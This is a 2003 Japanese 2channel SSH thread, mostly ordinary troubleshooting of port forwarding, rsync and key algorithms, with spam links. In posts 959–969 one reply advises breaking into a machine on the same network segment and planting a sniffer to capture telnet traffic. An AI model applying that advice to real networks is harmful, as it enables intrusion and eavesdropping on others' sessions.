862 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 22:50
見苦しいやつ…

863 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/27 01:57
>>862
うるせー馬鹿。鬼の首取ったように外出とか言ってんじゃねーよ。

864 名前:山崎渉 メール:(^^) 投稿日:03/05/28 16:47
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

865 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/30 23:44
以前から思ってたんですが、Win で sshd サービス立ち上げるのに、
Cygwin 以外の選択肢は無いスか?有料でもかまわんのだけど。

Win + ssh でググっても "Cygwin 導入" 的サイトしか見つからんのです。

866 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 00:04
昔はOpenSSHのwin32portあったような。
製品版なら、ssh社のものがあるし。

867 名前:名無しさん@お腹いっぱい。 投稿日:03/05/31 00:25
質問していいですか?
自宅のパソコンから大学のサーバーにsshでアクセスしたいのですがうまくいきません。
自宅側のルーターとかも設定しなくちゃだめなんでしょうか?

868 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 00:34
「うまくいかない」ってどううまくいかないの?
タイムアウトするの?
タイムアウトするなら、どっかのルータがブロックしてるかもね。

869 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 00:50
>>867
管理者に「外部からアクセスできますか?」と聞くのが第一手。

870 名前:867 投稿日:03/05/31 01:01
コマンドプロンプトでnetstat -nを実行したらport22はestablishedって表示されるんです。
でも、telnet localhost 110を実行すると接続に失敗しましたってでるんですよ。

管理者からは外部からはssh接続できるってききました。

お二人とも早速レス下さってありがとうございます。

871 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 01:21
>>870
その状態でこのスレに書き込んだキミの勇気に乾杯!
(今日はエビスの黒。こんなのが出たのか)

872 名前:867 投稿日:03/05/31 01:30
>>871
すいません、勉強不足です・・・

後学のため、どこに手をつけたら解決できるか教えてはいただけないでしょうか。
sshの勉強をすればいいのか、ルーターの説明書を読むべきなのもわかりません。


黒なんてあるんですね。学生は発泡酒で乾杯です。

873 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 01:34
>>872
「切り分け」をしよう。

telnet 大学のサーバ 22
を実行するとどうなるかね?
いつまで待っても何も出なかったり
すぐ切られたりしたらファイアウォールの問題。
SSH-2.0-OpenSSH_3.4p1 とかなんとか出れば ssh の問題。

874 名前:追加 メール:sage 投稿日:03/05/31 01:53
867の頭の問題

875 名前:867 投稿日:03/05/31 02:00
>>873
時間がかかって申し訳ありませんでした。
ご教示いただいた方法を試したところ

SSH-1.99-OpenSSH_3.5p1

と表示されました。
残念ながらこれを見ても自分には原因がわかりません。
お手数ですが、何を意味するのか教えていただけますか?

876 名前:867 投稿日:03/05/31 02:01
残念ながらではなくて、恥ずかしながらですね。
いや、お恥ずかしい・・・

877 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:04
そもそもどこまで理解してるんだか定かじゃないねぇ。
先にどっかで「質問の仕方」を身に付けてからにした方がお互いのためかも。


878 名前:867 投稿日:03/05/31 02:15
>>877
ちょっとは自分で調べろってことでしょうか。

そうですね、明らかに知識が不足しています。

もうちょっと頑張ってみます。

879 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:34
ssh -v しる。

880 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:38
>>878
22 番は通ることはわかったんだから、ルータやファイアウォールの問題はない、と。

881 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:40
870を読むに根本的に仕組みが理解できてないのではと(ry

882 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:41
22 は通るのに、キミは telnet <server> 110 を実行している。
一体キミは何をしたいのか?

まずはそこから、でしょう。

関係ないが、今日電車の中でマスタリング TCP/IP を読んでいる若者がいた。
思わず後ろから方を叩いて「若者よ、がんばれ」と声をかけたくなった(w

883 名前:882 メール:sage 投稿日:03/05/31 02:43
>>882
× 方
○ 肩
逝ってきます……

884 名前:867 投稿日:03/05/31 02:45
そうですね、根本的に仕組みが理解できてません・・・
大学の説明書を読んで見よう見まねだけでやってました。

ルーターや火壁に問題ないということはもうお手上げです。

皆さんおじゃましました。
ありがとうございmす。

885 名前:867 投稿日:03/05/31 02:47
>>882
大学の相談員の人にメールしたら、
そのコマンドでエラーがでるか確認してご覧といわれましたので実験してみました。

やっぱりちゃんとした本読んで仕組みを理解しろってことですね。

886 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 02:54
>>884
まずは何をしたいのかを言ってみたら?
正直、あなたがやりたいことがよくわかりません。




ごめん嘘。自宅から大学のメールボックスにアクセスしたいんだよね?(w
もちろんいろいろな方法があるのだが、大学のマシンに対してあなたがどの
程度の権限を持っているのか等の付加情報が必要です。

ヒント: ポートフォワーディング

887 名前:867 投稿日:03/05/31 03:03
>>886
そうです、メールボックスにアクセスしたいのです。

どの程度の権限ですか・・・。
大学のHPの説明ではSSH接続したならば、サーバーのlocalhostとして
認識されるから大学の内部からアクセスしたのと同じ状態になるそうです。
SSH接続できるようにサーバーのポートは開いてるそうです。

あと、IDとPASSは持ってます。
ってこんなあたりまえのことかくと、根本的にわかってないことまるわかりですよね。

888 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 03:03
あー、localhostの110ってそういう意味だったのか
やっと納得


889 名前:_ メール:sage 投稿日:03/05/31 03:06
http://homepage.mac.com/hiroyuki43/hankaku01.html

890 名前:867 投稿日:03/05/31 03:13
>>888
説明不足でごめんなさい。

過不足なしの基準がわからなんで。

891 名前:直リン 投稿日:03/05/31 03:14
http://homepage.mac.com/yuuka20/

892 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 03:15
>>887
最初から全部やろうとせずに段階を追え

・ ssh で対象サーバにログインできたのか?
・ ログインできたのなら、ポートフォワードは設定したのか?
 ただし、クライアントに何を利用しているかにより設定方法は異なる。
 また、フォワードの「向き」にも注意
・ ポートフォワードを設定したのなら、ようやく>>870の確認方法の出番

893 名前:867 投稿日:03/05/31 03:30
>>892
ポートフォワードですね。それをしてませんでした。
クライアントはSSH Communications Securityというところのを試用しています。
ここのトンネリングという設定項目をいじろうと思います。
あってますよね?


今まで2CHのレス見ておまえ馬鹿じゃないの、ちゃんと調べろよとか思ってましたが、
まさに自分が今そんな感じで申し訳なく思ってます。

今からポートフォワーディングに挑戦して解決したら報告に来ます。
優しい皆様方、厨な私にかまってくださってありがとうございました。

894 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 08:53
>870
>>telnet localhost 110を実行
は、ssh接続後にsshのウィンドウの中でやってる?

895 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 11:43
>>890
どこまで説明すれば良いかわかんなかったら、出せる限りの情報は先に出しとけよ。
出しすぎくらいでもかまわないからさ。長々としたレスでもかまわないからさ。
でないと、結局は今回みたいに数十レスを無駄にすることになる。
何をやりたくて、何を試して、どこまで進んで、どこでつまづいたか、全て書いとけ。
皆が皆、>>886 のように洞察力の優れた香具師ばかりっつーわけじゃないんだからさ。

896 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/31 11:50
まぁ「挑戦する」と言ってるんで、
また来るまで生温かく放置でよかろう。

897 名前:名無しさん@お腹いっぱい。 投稿日:03/06/02 14:25
誰か教えて!!
今、暗号勉強してて混乱してます。
あちこちのサイトとかで、Diffie-Hellman方式を公開鍵アルゴリズムの
中に入れている説明が多いんだけど、これって間違いですよね?

898 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/02 15:35
間違いではないです。

899 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/02 15:48
>>897
なぜ間違いだと思うのですか?

900 名前:897 投稿日:03/06/02 16:08
Diffie-Hellmanって対称な共通鍵をネゴする為のものじゃ
ないんですか?
もちろん、これを使って公開鍵を伝達することも出来るで
しょうが、少なくとも公開鍵暗号アルゴリズムじゃない
と思うんですが。

901 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/02 17:56
>>900
その間違っているというサイトの一例をあげてください。

きっと『公開鍵暗号アルゴリズム』の範囲が>897さんの思い込んでいる
範囲とずれているのでしょう。

902 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/02 18:01
>>900
> Diffie-Hellmanって対称な共通鍵をネゴする為のものじゃ
> ないんですか?

・DH から ElGamal (の暗号部分) は非常に自然に導出できるからまぁ
 同義と言ってしまってさほど問題なし (PGPv5 以降の公開鍵暗号ア
 ルゴリズムを DH と呼んでる例は山ほどある)
・公開鍵暗号にしたところで上に書かれた以外の用途に用いることは
 極めて稀 (というか実用例はたぶん皆無。もちろん署名は除外)

だもんで、DH を『公開鍵 (暗号) アルゴリズム』と呼ぶことに特に違
和感はないなぁ。

903 名前:897 投稿日:03/06/02 18:38
>>901
>その間違っているというサイトの一例をあげてください。

「diffie-hellman 公開鍵」でググルとたくさん出てきます。

>きっと『公開鍵暗号アルゴリズム』の範囲が>897さんの思い込んでいる
>範囲とずれているのでしょう。
どうも、これが正解のようです。
つまり「公開鍵方式」「DH方式」の定義の問題。
僕は「公開鍵方式=非対称鍵方式のペア鍵の片方を公開する方式」
と思い込んでました。
鍵を安全なルートで交換する必要がないものは全て「公開鍵方式」
とする定義も有効なようですね。


904 名前:897 投稿日:03/06/02 18:40
>>902
SSH2やIPsecではElGamalじゃなく本来の意味での
Diffie-Hellman鍵交換(共通の秘密鍵の交換)が
使われているんじゃないんですか?

905 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/02 21:52
>>904
> SSH2やIPsecではElGamalじゃなく本来の意味での
> Diffie-Hellman鍵交換(共通の秘密鍵の交換)が
> 使われているんじゃないんですか?

じゃなくて、公開鍵暗号にしたところで共通鍵をネゴするためにしか
使わないんだから公開鍵配布系と厳密に区別しても意味ないっしょ、っ
て話。



906 名前:名無しさん@お腹いっぱい。 投稿日:03/06/02 22:02
>>905
えっ、そうなんですか?
「公開鍵暗号は共通鍵をネゴするためにしか使われない」
っていうのは僕には理解不能です。
もう少し勉強してまた来ます。。。。

907 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/02 22:44
>>906
『…使われない』と言ってしまうとちょっと違うと私も思います。

パフォーマンスなどを考慮して*現状では*暗号化そのものには公開鍵を
使わないで共通鍵の交換にしか使っていない、ということでしょう。

908 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/02 22:48
>>904
それで合ってます。

>897さんの公開鍵暗号の厳密な定義は間違ってはいないとは思いますが、実際のところ
それを厳格に守ることによって得るものがほとんどないので気にする人は少ないっていう
ところでしょうか。(しかし学問としてやってるなら厳密に区別してしかるべきでしょうね。)

909 名前:897 投稿日:03/06/02 23:13
>>907
>>908
ああ、そういうことですか。。。
ユーザの立場だったら厳密に区別しても疲れるだけなんでし
ょうね。
僕はプログラマで、あるところから独自VPNの構築の仕事の
話が来ているもので、お客さんとの打ち合わせに先立って厳
密に理解しておきたいのです。
暗号方式に関わる諸概念が結構曖昧に使われているというこ
とが分かっただけでも収穫でした。どうもありがとう。

910 名前:直リン 投稿日:03/06/02 23:14
http://homepage.mac.com/yuuka20/

911 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/03 12:54
>>907
> パフォーマンスなどを考慮して*現状では*暗号化そのものには公開鍵を
> 使わないで共通鍵の交換にしか使っていない、ということでしょう。

なーんてことを考えてた時期もあったなぁ。いずれ公開鍵暗号だけで
すべてが済むほど計算機の性能が上がる筈だ、とか夢みたいなことを
ね。

現実は逆で計算機の性能が上がるほど公開鍵暗号が不利になるばかり
なりけり…。


912 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/04 15:46
計算機の性能が上がりゃそれ以上に暗号強度も上げにゃあかんからなぁ…


913 名前:名無しさん@お腹いっぱい。 投稿日:03/06/05 02:13
で、TTSSHのv2対応版が出たわけですが
みなさんもう使ってますか?

914 名前:初期不良 メール:sage 投稿日:03/06/05 02:19
>>913
日本語関係変だったり putty 形式の鍵に変換しないといけなかったり
pagent 立ち上げないといけなかったりしなかったっけ?
面倒なんで ssh2 を使いたい場合は cygwin 使ってマフ

915 名前:初期不良 メール:sage 投稿日:03/06/05 02:20
>>913
って TTSSH?! 見てきまつ

916 名前:初期不良 メール:sage 投稿日:03/06/05 03:04
見つからないっす...

917 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/05 04:02
>>913
そういうときは配布元 URL を貼るのが礼儀ってもんじゃねえか?

918 名前:名無しさん@お腹いっぱい。 投稿日:03/06/05 08:40
ガセだよ

919 名前:名無しさん@お腹いっぱい。 投稿日:03/06/05 15:40
chrootでパッチを当ててOpenSSHを使用しています。
ログインするとchrootで見える場所に/etc/passwdは
あるのですが、実際には読んでいないらしく、
ユーザIDとグループIDがそのまま表示されてしまいます。

ご存知の方教えていただけますでしょうか。

920 名前:おお 投稿日:03/06/05 15:42
ゲーム感覚で貼りまくってやっーと月40万円稼いぎましたwww。

参加は無料なので参加してみるだけ参加してください。

自分でリンクを貼るより紹介者を集めた方が効率が良いようです。
紹介者の10%が自分の利益になります。

http://www.adultshoping.com/addclickport.cgi?pid=1052229999



921 名前:_ メール:sage 投稿日:03/06/05 15:44
http://homepage.mac.com/hiroyuki43/moe/jaz08.html

922 名前:_ メール:sage 投稿日:03/06/05 17:20
http://homepage.mac.com/hiroyuki43/moe/jaz08.html

923 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/05 18:48
>>919
> chrootでパッチを当ててOpenSSHを使用しています。

OS は?

> ログインするとchrootで見える場所に/etc/passwdは
> あるのですが、実際には読んでいないらしく、
> ユーザIDとグループIDがそのまま表示されてしまいます。

system call 呼出の trace 付で ls -l とか呼んでみりゃ何が必要か
分かるだろう。たとえば OpenBSD だと /etc/pwd.db ってファイルが
要るようだし、とある linux では /etc/nsswitch.conf がないとマズー
みたいだし。



924 名前:_ メール:sage 投稿日:03/06/05 19:13
http://homepage.mac.com/hiroyuki43/2ch.html

925 名前:_ メール:sage 投稿日:03/06/05 20:51
http://homepage.mac.com/hiroyuki43/2ch.html

926 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/11 10:58
逆引きに IP アドレスのようなものを書かれるとマズいらしい。

Vulnerability Note VU#978316
Vulnerability in OpenSSH daemon (sshd)
http://www.kb.cert.org/vuls/id/978316

OpenSSH remote clent address restriction circumvention
http://www.securityfocus.com/archive/1/324016/2003-06-02/2003-06-08/0

927 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/15 22:05
マトリックスリローテッド観ました。
発電所を爆破するシーンでトリニティーがコンソールからSSHでログインしてました。
あんな未来までSSHは残るのですね。



928 名前:名無しさん@お腹いっぱい。 投稿日:03/06/16 00:50
rsync+sshでディレクトリを同期しています。セキュリティ対策のためsshのポートを22から22222に変えたんですが、rsyncでコピーするときにsshのポートを指定する方法が分かりません。
rsync -avz -e "ssh -p 22222" --delete /home/ hogehoge@gehoho.hogege.net:/home/
とするとパスワードの入力はOKなんですが

[root@www:~]rsync -avz -e "ssh -p 22222" --delete /home/ hogehoge@gehoho.hogege.net:/home/
hogehoge@gehoho.hogege.net's password:
bash: line 1: rsync: command not found
rsync: connection unexpectedly closed (0 bytes read so far)
rsync error: error in rsync protocol data stream (code 12) at io.c(165)

となってその後にエラーが出てしまいます。単純に書き方が悪いんだと思いますが、どう書いたらいいのでしょうか?ググってもポートフォワーディングのことばっか当たるし・・・
たしけて。

929 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/16 00:58
$HOME/.ssh/config 辺りに

Host gehoho.hogege.net
 Port 22222
でどうよ? man ssh_config


930 名前:名無しさん@お腹いっぱい。 投稿日:03/06/16 01:17
>>929
どうもです。早速.ssh/configに追加してみました。ポートの指定なしに
rsync -avz --delete -e ssh /home/ hogehoge@gehoho.hogege.net:/home/
で繋がるようになりましたが・・・

その後、パスワードの入力後は先ほどと変わらず
hogehoge@gehoho.hogege.net's password:
bash: line 1: rsync: command not found
rsync: connection unexpectedly closed (0 bytes read so far)
rsync error: error in rsync protocol data stream (code 12) at io.c(165)
と出てしまいます。となると文法的には先ほどのであってたのでしょうか?
なんか別の所に問題がありそうなヨカソ。
command not foundって何ぢゃ?

931 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/16 01:21
リモート側の rsync にパスが通ってないんと違う?


932 名前:名無しさん@お腹いっぱい。 投稿日:03/06/16 01:22
>>927
マトリックス内の時代は 現代とそう変わらないから。
だから超未来のシーンってわけじゃないよ。

つーか、鍵屋のおっさんカッコイイ!

933 名前:名無しさん@お腹いっぱい。 投稿日:03/06/16 01:29
>>931
すんません。どういう意味でしょう・・・?UNIXは日が浅いもんで。
リモート側のrsyncにパスが通ってないというとこの場合hogehogeに対して
通してあげればいいのでしょうか。

934 名前:_ メール:sage 投稿日:03/06/16 01:37
http://homepage.mac.com/hiroyuki44/

935 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/16 01:44
繋げる先のrsyncのパスを指定してみよう
--rsync-path=

936 名前:初期不良 メール:sage 投稿日:03/06/16 05:02
>>932
違います。レトロさをフィーチャーしているんです。

937 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/16 14:02
>>927
この辺の話?
http://www.nmap.org/

938 名前:ssh2 投稿日:03/06/17 07:43
TeraTerm Pro Web 3.1.3 - Enhanced Telnet/SSH2 Client

http://www.ayera.com/teraterm/

939 名前:sage 投稿日:03/06/17 13:09
>>935
繋がりますた。ありがとう!

940 名前:あれ? メール:sage 投稿日:03/06/17 13:10
sageだってば。間違いた。

941 名前:名無しさん@お腹いっぱい。 投稿日:03/06/18 06:22
WinCEでPortForwardingによるtelnet接続を試みていますが、
成功しないため、何かアドバイスをいただけたらと思います。

環境
鯖:RedHat9 + OpenSSH 3.5p1
クライアント:Sigmarion2(H/PC2000) + PortForwarder1.1.1 + 24Term 2002.04.12版

やったこと
(1) 鯖で ssh-keygen -t rsa1 で鍵作成
(2) identity* をクライアントにコピー
(3) 鯖で identity.pubを ~/.ssh/authorized_keysにコピー
(4) PortForwardingの設定(後述)
(5) PortFowarderの起動
(6) 24Term で localhost に telnet

PortForwardingの設定(Config.txtファイル)
Host dqn
HostName dqn.omaemona.com
User nanashi
LocalForward 23 dqn.omaemona:23

PortForwarderによるSSH接続はできていると思います。
Status: Connetcted となり、シェルコマンドも正しい応答が得られます。
ですが、localhostにtelnetすると、エラーメッセージなどなく、すぐに接続が
切られてしまいます。鯖の/var/log/secureにはそれらしいものは
残っていません。

何か思い当たることがありましたらご意見ください。

942 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/18 09:41
>>936
ちゃんと1作目見た?

943 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/18 12:52
>>941
> 何か思い当たることがありましたらご意見ください。

PortForwarder は使ったことないんでよく分からんけど、どうやら
OpenSSH の config と同じ書式らしいので気付いた点。

> PortForwardingの設定(Config.txtファイル)
> Host dqn
> HostName dqn.omaemona.com
> User nanashi
> LocalForward 23 dqn.omaemona:23

サーバ (dqn.omaemona.com) で dqn.omaemona の名前解決はできてる?

んで、接続したサーバ自身の port を LocalForward したいってだけ
なら

> LocalForward 23 localhost:23

なんて書き方の方が紛れが少ない (かも)。


944 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/18 16:22
>>927
あんた最悪。激しくガイシュツな上にネタばらし。

945 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/18 18:39
>>941
PortForwarder 0.5.11 しか知らないけど、Show tty message のチェックをは
ずす


946 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/19 07:59
>>941
> 何かアドバイスをいただけたらと思います。

他人のドメイン名を勝手に例示に用いないこと

947 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/21 16:50
漏れが普通 ssh 接続すると、多くは rsa 接続になるような気がするのですが、
ある FreeBSD 機から ssh 接続すると、dsa を使います。

dsa を使って接続する、と言うのを明示的に指定できますか?
-1 や -2 だとプロトコルしか指定できないような気がして…。
-2 の上でさらに、rsa か dsa か、暗号化方式は選べないものでしょうか。

948 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/21 17:16
>>947
-o

949 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/21 17:20
スバラシイお答えですな。

-i とか IdentityFile じゃないのか

950 名前:名無しさん@Emacs メール:sage 投稿日:03/06/21 18:17
>>947
> 漏れが普通 ssh 接続すると、多くは rsa 接続になるような気がするのですが、
> ある FreeBSD 機から ssh 接続すると、dsa を使います。
>
> dsa を使って接続する、と言うのを明示的に指定できますか?

「dsa を使って接続する」というのがどういう意味かよくわからん…

> -1 や -2 だとプロトコルしか指定できないような気がして…。
> -2 の上でさらに、rsa か dsa か、暗号化方式は選べないものでしょうか。

SSHプロトコル2では dsa も rsa もユーザやリモートホストの
「認証」にしか使っていない。

で、ユーザ認証に使うアルゴリズムを選択したいのなら
>>949のとおり。

リモートホストの認証に使うアルゴリズム(= known_hosts ファイルに
書き込まれる公開鍵の種類)を選択したいのなら
ssh_config の HostKeyAlgorithms を指定すればよし。


951 名前:950 メール:sage 投稿日:03/06/21 18:40
あ、950踏んでた。

次スレどうする?
進行遅そうだから>>980辺りまで待つ?

952 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/21 19:49
>>951

> 進行遅そうだから>>980辺りまで待つ?
でいいんじゃないかなぁ。マターリ行こう

953 名前:948 メール:sage 投稿日:03/06/21 20:24
みなさまどうもありがとうございます。

>>950
> SSHプロトコル2では dsa も rsa もユーザやリモートホストの
> 「認証」にしか使っていない。

これが分かっていなかったです。

> リモートホストの認証に使うアルゴリズム(= known_hosts ファイルに
> 書き込まれる公開鍵の種類)を選択したいのなら
> ssh_config の HostKeyAlgorithms を指定すればよし。

今回やりたかったことはこちらでした。
おかげさまで、
% slogin dst -o"HostKeyAlgorithms ssh-dss,ssh-rsa"
としてホスト dst に dsa でリモートホスト認証する (してもらう?)
ことができました。


954 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/23 10:47
最近の openssh では AllowHosts/DenyHosts の設定ができないことに
今さらながら気がついたんですが、どうしてなんでしょうか。

まあ、--with-tcp-wrappers で configure すればいいんですけど。
……っていうか、それが理由?

955 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/23 10:59
>>954
これ関連か?
http://www.securityfocus.com/bid/7831

956 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/23 21:05
IP addressみたいな信用おけないものを認証にからめちゃいけないという
考えもあるシナー。

957 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/06/25 14:49
>954
AllowUsers/DenyUsersでそれっぽくできることは知ってるよね

958 名前:名無しさん@XEmacs メール:sage 投稿日:03/06/26 12:40
>>957
> >954
> AllowUsers/DenyUsersでそれっぽくできることは知ってるよね

つーか、OpenSSH で AllowHosts/DenyHosts ができたことってあるの
か?



959 名前:JN-25 投稿日:03/07/14 10:32
r系コマンドでログインしたマシンのセッションを、どうしたら平分で垂れ流された
通信内容を傍受することができますか。

960 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 10:54
>>959
板違い。

961 名前:_ メール:sage 投稿日:03/07/14 11:36
http://homepage.mac.com/hiroyuki44/

962 名前:JN-25 投稿日:03/07/14 12:15
どうやって傍受するの

963 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 12:43
ふつーにやればできる。

964 名前:JN-25 投稿日:03/07/14 13:26

        user: hage
        Password:hoge        
マシンA------------telnet------------------>サーバ




マシンA------------ssh------------------>サーバ
jfirhufr987342jsdj983scnsahfy8
jfq98ur34jksd8q8udsu8dedandndj
hdsf98y349r8hsdsuhsofhfihhouhf

ですけど、どうやったらtelnetセッションを覗き見できるんですか。
自分としては、ただ単に世間一般で言われてるtelnetが如何に酷いか
知りたかっただけです。

965 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 13:32
>>964
マシンAもしくはそれと同じセグメントにあるマシンを crack し
sniffer をしかける。

966 名前:JN-25 投稿日:03/07/14 13:40
>>965
要するに外部から覗き見るならまず最初に、
マシンAに侵入して、そこからsniffer仕掛けるってことだよね?

967 名前:JN-25 投稿日:03/07/14 13:42
てっきり、tcpdumpするのかと思ってた、、、

968 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 13:49
>>966
A とバカハブで同じセグメントにつながってるマシンがあれば
そっちでもいい。

>>967
tcpdump は sniffer の一種。

969 名前:JN-25 投稿日:03/07/14 13:53
どうもです。
今日試してみて見ます。

勿論、自分で作ったラボでね、、、

970 名前:JN-25 投稿日:03/07/14 15:25
また変な質問して済まんが、UN*X系のOSで一番お勧めのオープンソースの
snifferっていったら大抵のエキスパートは何を使いますか。

私が思いつく以上、tcpdumpしか無いと思ってるのですが、、、

971 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 15:36
>>970
くだらない質問はここに書き込め!なんでもアリ25
http://pc.2ch.net/test/read.cgi/unix/1055864733/

972 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 15:41
トラフィック中から特定のデータをふるいだそうとしてるやつがさ、
どうしてSSHスレという特定のデータの場所に無関係なデータを
混ぜようとするのか不思議だ。

973 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 20:58
厨とはそういう生き物

974 名前:名無しさん@お腹いっぱい。 投稿日:03/07/14 21:54
遠隔地から、あるネットワークの根権限を取得したいのですが、どうやれば取得が可能でしょうか。

975 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 22:11
>>974

1) 管理者に聞く
2) 管理者の背中越に覗き見る

が、一番手っ取り早いと思うにょ とりあえず(・∀・)ガンガレ!


976 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 22:22
遠隔地からじゃイロジカケは無理かな。

977 名前:名無しさん@お腹いっぱい。 投稿日:03/07/14 22:40
>>975
管理者に聞かず、尚且つ物理的に覗き見ることなく遠隔地の根権限を
獲得するにはどうしたら良いでしょうか。

そういう事は可能だと聞きました。
でも、学校では不可能と教えられました。

978 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 22:46
>>977
> そういう事は可能だと聞きました。
> でも、学校では不可能と教えられました。
その通り。お前には不可能。

979 名前:名無しさん@お腹いっぱい。 投稿日:03/07/14 23:01
>>978
分かってるのなら教えて下さいよ。やり方だけでも

980 名前:名無しさん@お腹いっぱい。 メール:sage と、無理矢理sshネタにしてみる 投稿日:03/07/14 23:35
>>979
Matrix Reloadedでも見れ。

981 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/14 23:44
>>979
>>975の「管理者に聞く」の意味を百万年考えろ。
それでもまだわからんかもしれんが。

982 名前:名無しさん@お腹いっぱい。 投稿日:03/07/15 00:45
私が作った無料サイトだよ♪
私も出てるよ〜
http://angelers.free-city.net/page001.html

983 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 00:59
980超えちゃったし、次スレ立てたほうがいいんでない?
それにしてもみんなやさしいなぁ。どれだけ邪険でも回答するんだから。

984 名前:950=980 メール:sage 投稿日:03/07/15 01:06
>>983
> 980超えちゃったし、次スレ立てたほうがいいんでない?
ちょっと待ってちょ。
今、スレ立ての準備してます。

985 名前:950=980 メール:sage 投稿日:03/07/15 01:40
うう、何度やってもスレ立てに失敗する…
どなたか代わりにおながいします。

以下テンプレ

---
SSH その3


SSHに関する情報交換のスレッドです。

FAQ、リンク集は >>2-5 あたり。

前スレ: http://pc.2ch.net/test/read.cgi/unix/1028157825/
前々スレ: http://pc.2ch.net/unix/kako/976/976497035.html

---
よくある質問

Q. 公開鍵認証などは使用せず、パスワードによる認証を行う場合でも
そのパスワードは暗号化されているのですか?
A. はい、その通りです。
SSHプロトコルでは、まず始めにサーバ<->クライアント間で
暗号化された通信路を確立します。
ユーザ認証はその暗号化通信路の上で行なわれるので、
パスワードなどもちゃんと秘匿されています。


986 名前:950=980 メール:sage 投稿日:03/07/15 01:40
関連リンク集

本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/
OpenSSH: http://www.openssh.com/ja/
OpenSSH情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSHマニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
OpenSSH-HOWTO: http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ): http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF secsh protocol: http://www.ietf.org/html.charters/secsh-charter.html
PortForwarder: http://www.fuji-climb.org/pf/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/sshvnc.html
Tramp: http://www.nongnu.org/tramp/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550


987 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 02:03
SSH その3
http://pc.2ch.net/test/read.cgi/unix/1058202104/

立てたけど、しばらく立てないほうがよかったかもね。

988 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 02:03
SSH その3
